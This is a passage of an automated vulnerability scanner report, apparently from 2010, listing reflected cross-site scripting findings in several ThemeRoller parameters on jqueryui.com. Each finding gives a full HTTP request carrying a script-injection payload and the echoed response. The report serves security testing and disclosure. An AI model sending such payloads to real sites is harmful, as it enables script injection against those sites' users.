Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ed"><script>alert(1)</script>95358923f11 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTe
...[SNIP]...

1.38. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a27a"><script>alert(1)</script>10d27831cca was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=
...[SNIP]...

1.39. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605a3"><script>alert(1)</script>449b4443c2d was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.p
...[SNIP]...

1.40. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b2e"><script>alert(1)</script>ab77fccbd26 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.41. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678d"><script>alert(1)</script>afc432a7bb6 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefaul
...[SNIP]...

1.42. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fd"><script>alert(1)</script>f5ecfc6aec0 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tyActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fla
...[SNIP]...

1.43. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ef8"><script>alert(1)</script>5eda88eabce was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=
...[SNIP]...

1.44. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa395"><script>alert(1)</script>0fa87626802 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColor
...[SNIP]...

1.45. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 286af"><script>alert(1)</script>fa88153198a was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=
...[SNIP]...

1.46. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8b"><script>alert(1)</script>2e205dee113 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureSh